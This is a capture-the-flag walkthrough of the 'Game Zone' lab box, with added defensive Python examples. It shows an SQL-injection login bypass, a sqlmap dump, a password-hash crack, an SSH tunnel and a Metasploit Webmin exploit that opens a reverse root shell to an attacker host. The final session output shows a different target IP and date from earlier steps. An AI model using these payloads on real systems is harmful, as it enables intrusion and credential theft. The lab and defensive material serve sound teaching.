Game Zone
Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
Scanning
nmap
root@ip-10-10-202-12:~# nmap -T4 -A 10.10.42.26
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 13:48 BST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.00% done; ETC: 13:50 (0:01:39 remaining)
Nmap scan report for ip-10-10-42-26.eu-west-1.compute.internal (10.10.42.26)
Host is up (0.00057s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
MAC Address: 02:AE:D8:BA:8A:FD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms ip-10-10-42-26.eu-west-1.compute.internal (10.10.42.26)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.96 seconds
Enumeration
port 80
The site has a login page; let's try SQL injection.
Initial Access
SQLi
Use ' or 1=1 -- - as your username and leave the password blank.
We're in. Now try entering a single quote (') in the portal's search box.
The search form is vulnerable to SQL injection as well; let's use SQLMap to dump the database.
The backend is running MySQL.
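To show why the ' or 1=1 -- - payload above works and what the fix looks like, here is an added example that is not part of the original writeup or the Game Zone site. It uses an in-memory SQLite table as a constructed stand-in for the MySQL users table; the column names (pwd, username) and the unsalted SHA-256 storage are kept only to mirror the SQLMap dump on this page, not as a recommendation. The same comparison applies to the search form, which concatenates searchitem into a query the same way.

```python
import hashlib
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the site's user table. The columns
    mirror the sqlmap dump on the page: pwd holds an unsalted SHA-256 hex
    digest and username the login name."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (pwd TEXT, username TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        (hashlib.sha256(b"videogamer124").hexdigest(), "agent47"),
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Login check built by string formatting, the pattern the page's
    ' or 1=1 -- - payload defeats: the quote closes the string literal,
    `or 1=1` makes the WHERE clause true for every row, and `-- -`
    comments out the rest of the statement, including the password test."""
    pwd = hashlib.sha256(password.encode()).hexdigest()
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND pwd = '{pwd}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver passes the input as data,
    so a quote in the username can never change the statement's structure."""
    pwd = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, pwd),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "' or 1=1 -- -"
    print("string-built query:", vulnerable_login(db, payload, ""))  # agent47
    print("parameterised query:", safe_login(db, payload, ""))       # None
```

Running the block logs in as agent47 through the concatenated query with an empty password, while the parameterised version returns None for the same input and only succeeds with the real credentials.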
SQLMap
Let's capture the search request with Burp Suite first
and save it to a text file:
root@ip-10-10-202-12:~# cat req.txt
Host: 10.10.42.26
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.42.26
Connection: close
Referer: http://10.10.42.26/portal.php
Cookie: PHPSESSID=lkupl1irpcikelbq03vroe3ii5
Upgrade-Insecure-Requests: 1
searchitem=test
# sqlmap -r req.txt --dbms=mysql --dump
# -r request
# --dbms tells SQLMap what type of database management system it is
# --dump attempts to output the entire database
root@ip-10-10-202-12:~# sqlmap -r req.txt --dbms=mysql --dump
___
__H__
___ ___["]_____ ___ ___ {1.2.4#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
. . .
[SNIP]
. . .
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
Let's crack this hash and then connect over SSH.
Using John the Ripper with rockyou.txt to crack the hash (saved to a file named hash):
root@ip-10-10-202-12:~# john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2021-09-22 14:13) 3.333g/s 9721Kp/s 9721Kc/s 9721KC/s vimivera..veluasan
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
Credentials: agent47:videogamer124
SSH into the target with these credentials.
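The dump above stores passwords as unsalted SHA-256, which is why John recovers the password from rockyou.txt in under a second. The following added example (mine, not from the writeup or the room) shows the mechanism and the fix side by side: a dictionary check against unsalted SHA-256 digests, where one digest per candidate word tests every user at once, next to a salted, iterated PBKDF2-HMAC-SHA256 scheme where each user needs separate work and a leaked table cannot be matched against a precomputed list. The wordlist, the user dump and the pbkdf2_sha256$ storage format are all constructed for the example; only agent47 and videogamer124 come from the page.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "letmein", "videogamer124", "qwerty"]

# Constructed dump in the shape of the sqlmap output on the page
# (username -> unsalted SHA-256 hex). Digests are computed here so the
# example is self-contained; bob's password is deliberately not in WORDLIST.
SAMPLE_DUMP = {
    "agent47": hashlib.sha256(b"videogamer124").hexdigest(),
    "alice": hashlib.sha256(b"letmein").hexdigest(),
    "bob": hashlib.sha256(b"correct-horse-not-in-list").hexdigest(),
}


def crack_raw_sha256(dump, wordlist):
    """Return {username: password} for every dump entry whose unsalted
    SHA-256 matches a wordlist candidate. Because there is no salt, one
    digest per candidate is compared against every user's hash."""
    lookup = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in dump.items() if h in lookup}


# Iteration count chosen for this example (OWASP's 2023 guidance for
# PBKDF2-HMAC-SHA256 is 600,000); this is an assumption, not a page value.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, salt=None):
    """Salted, iterated hash in a constructed self-describing format:
    pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                                 PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count and compare in
    constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("recovered from unsalted SHA-256:",
          crack_raw_sha256(SAMPLE_DUMP, WORDLIST))
    stored = hash_password("videogamer124")
    print(stored)
    print("verify correct:", verify_password("videogamer124", stored))
    print("verify wrong:  ", verify_password("videogamer125", stored))
```

Two stored values for the same password differ because each carries its own random salt, so an attacker who obtains the table has to run the full iteration count per user per candidate rather than reuse one precomputed digest across the whole dump.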
Privilege Escalation
Enumerate Services
A service is listening on port 10000, bound to 0.0.0.0 (all interfaces),
but the external nmap scan did not show it, so it can only be reached from the box itself.
Let's set up an SSH tunnel (ssh -L local port forwarding) so the attacker machine can reach it:
root@ip-10-10-202-12:~# ssh -L 10000:localhost:10000 agent47@10.10.42.26
agent47@10.10.42.26's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Wed Sep 22 08:16:05 2021 from 10.10.202.12
agent47@gamezone:~$
Now the target's port 10000 is reachable as localhost:10000 on the attacker machine.
Log in with the credentials agent47:videogamer124.
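The reasoning in this step, comparing what listens on the box with what the external scan could see, is something a defender can automate. The following is an added example, not output from the box or code from the writeup: it parses a constructed ss -tulpn style listing, compares it with the ports the page's nmap scan reported (22 and 80), and flags listeners bound to a routable or wildcard address that the outside world cannot reach. Those are the services protected only by filtering, which anyone with a shell on the host (here, via SSH) can reach directly or forward out with ssh -L. The 3306 entry is constructed to show the loopback case.

```python
import re

# Constructed ss -tulpn style listing; it is not output captured from the
# target. It models what the page describes: port 10000 listening on 0.0.0.0
# although the external nmap scan reported only 22 and 80.
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:10000      0.0.0.0:*
tcp   LISTEN 0      128    *:80               *:*
udp   UNCONN 0      0      0.0.0.0:10000      0.0.0.0:*
"""

# Ports the page's external scan (nmap -T4 -A) reported open.
EXTERNAL_OPEN = {22, 80}

LOCAL_RE = re.compile(r"^(?P<addr>.+):(?P<port>\d+)$")
LOOPBACK = {"127.0.0.1", "[::1]", "::1"}


def parse_listeners(ss_text):
    """Return (proto, addr, port) for each listening TCP / bound UDP socket
    in ss -tulpn output. The header line is skipped."""
    listeners = []
    for line in ss_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5 or fields[1] not in ("LISTEN", "UNCONN"):
            continue
        match = LOCAL_RE.match(fields[4])
        if match:
            listeners.append((fields[0], match["addr"], int(match["port"])))
    return listeners


def classify(listeners, external_open):
    """Split TCP listeners into three buckets:
    exposed       - also open in the external scan
    loopback_only - bound to 127.0.0.1/::1, unreachable from the network by design
    hidden        - bound to a routable or wildcard address but absent from the
                    external scan, i.e. shielded only by filtering."""
    buckets = {"exposed": set(), "loopback_only": set(), "hidden": set()}
    for proto, addr, port in listeners:
        if proto != "tcp":
            continue
        if addr in LOOPBACK:
            buckets["loopback_only"].add(port)
        elif port in external_open:
            buckets["exposed"].add(port)
        else:
            buckets["hidden"].add(port)
    return {name: sorted(ports) for name, ports in buckets.items()}


if __name__ == "__main__":
    for name, ports in classify(parse_listeners(SS_OUTPUT), EXTERNAL_OPEN).items():
        print(f"{name:14s} {ports}")
```

On a real host, feed it the output of ss -tulpn and the port list from an authorised external scan; anything in the hidden bucket deserves the same patching and authentication scrutiny as an exposed service, because a single firewall change or a compromised low-privilege account turns it into one.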
root@ip-10-10-202-12:~# nmap -sV -p 10000 127.0.0.1
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 15:34 BST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000044s latency).
PORT STATE SERVICE VERSION
10000/tcp open http MiniServ 1.580 (Webmin httpd)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 seconds
Version: MiniServ 1.580 (Webmin)
Metasploit
$ msfconsole -q
msf5 > search CVE-2012-2982
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
Let’s select it and set a reverse shell for our payload:
msf5 > use 0
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > show options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin 1.580
Now, let’s set up our variables:
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set rpot 10000
rpot => 10000
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
username => agent47
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
password => videogamer124
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.8.50.72
lhost => 10.8.50.72
We are all set. Let’s exploit.
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit
[*] Started reverse TCP double handler on 10.8.50.72:4444
[*] Attempting to login...
[+] Authentication successfully
[+] Authentication successfully
[*] Attempting to execute the payload...
[+] Payload executed successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wwkNQ0H13ZRfhiYE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "wwkNQ0H13ZRfhiYE\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.8.50.72:4444 -> 10.10.60.68:32784) at 2020-06-08 19:59:09 +0200
pwd
/usr/share/webmin/file/
whoami
root